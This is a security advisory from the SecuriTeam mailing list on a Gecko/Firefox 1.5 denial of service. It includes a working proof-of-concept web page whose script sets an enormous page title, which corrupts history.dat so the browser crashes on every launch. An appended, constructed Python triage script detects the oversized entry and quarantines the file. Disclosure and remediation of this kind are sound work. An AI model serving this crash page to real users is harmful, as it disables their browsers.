[NEWS] Gecko Engine Multiple Vendor DoS (History.dat)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

Gecko <http://www.mozilla.org/newlayout/> is the open source web browser
layout engine used in all Mozilla-branded software and its derivatives,
including later Netscape releases. Written in C++, Gecko is designed to
support open Internet standards. Originally created by Netscape
Communications Corporation, its development is now overseen by the Mozilla

A vulnerability in the way Gecko reads the History.dat file allows remote
attackers to cause the program to freeze, thus causing a denial of


A denial of service vulnerability exists in Gecko's handling of the user's
URL visiting history data. The History.dat file stores visited URLs and is
read when the engine starts. When a remarkably large URL is inserted into
the History.dat file, the browser will crash on start. This can be exploited
by malicious people by persuading a user to visit a specially crafted web

Proof of Concept:
<!-- Firefox 1.5 buffer overflow

Basically Firefox logs all kinds of URL data in its history.dat file,
this little script will set a really large topic and Firefox will then
save that topic into its history.dat. The next time that Firefox is
opened, it will instantly crash due to a buffer overflow -- this will
happen every time until you manually delete the history.dat file -- which
most users won't figure out.

This proof of concept will only prevent someone from reopening
their browser after being exploited. DoS if you will. However, code
execution is possible with some modifications.

Tested with Firefox 1.5 on Windows XP SP2.

ZIPLOCK <sickbeatz@xxxxxxxxx>

-->
<html><head><title>heh</title><script type="text/javascript">
function ex() {
    // Build a 5000-character string.
    var buffer = "";
    for (var i = 0; i < 5000; i++) {
        buffer += "A";
    }
    // Append it 500 more times, then store the result as the page title.
    var buffer2 = buffer;
    for (i = 0; i < 500; i++) {
        buffer2 += buffer;
    }
    document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
</a></body></html>


The information has been provided by ZIPLOCK <mailto:sickbeatz@xxxxxxxxx>.
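
Added triage example (not part of the advisory or of the original post): because the crash repeats until history.dat is removed, this Python script checks a profile's history.dat for an oversized stored value and renames the file aside so the browser can start again. It assumes history.dat is a Mork text file with "(id=value)" cells; the 64 KiB limit, the function names and the sample data are constructed for illustration.

```python
import os
import re

# Assumption (not stated in the advisory): history.dat is a Mork text file
# whose values are written as "(id=value)" cells, with "\" escaping the next
# byte (including ")" and a line break inside a long value).
MAX_VALUE_BYTES = 64 * 1024  # hypothetical limit, far above ordinary URLs and titles


def longest_value(data: bytes) -> int:
    """Return the size in bytes of the largest cell value in Mork text."""
    # Replace each two-byte escape with two filler bytes so an escaped ")"
    # cannot end a value early, while on-disk lengths stay unchanged.
    flat = re.sub(rb"\\.", b"__", data, flags=re.DOTALL)
    # Drop any tail after the last ")" so every "=" below has a terminator
    # and the scan stays linear on a truncated or hostile file.
    flat = flat[: flat.rfind(b")") + 1]
    return max((len(m.group(1)) for m in re.finditer(rb"=([^)]*)\)", flat)),
               default=0)


def quarantine_if_oversized(path: str, limit: int = MAX_VALUE_BYTES):
    """Rename history.dat aside if it holds an oversized value.

    Returns the quarantine path, or None when the file is left in place.
    Run it with the browser closed.
    """
    with open(path, "rb") as fh:
        size = longest_value(fh.read())
    if size <= limit:
        return None
    target = path + ".quarantined"
    os.replace(path, target)  # keep the file for analysis instead of deleting it
    return target


def sample_history(title: bytes) -> bytes:
    """Constructed sample: a minimal Mork-like file with one URL and one title."""
    return (b"<(80=ns:history:db:row:scope:history:all)(82=URL)(84=Name)>\n"
            b"<(90=http://example.com/)(91=" + title + b")>\n"
            b"{1:^80 [1(^82^90)(^84^91)]}\n")
```

The renamed file is kept rather than deleted so the stored entry can be examined later.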

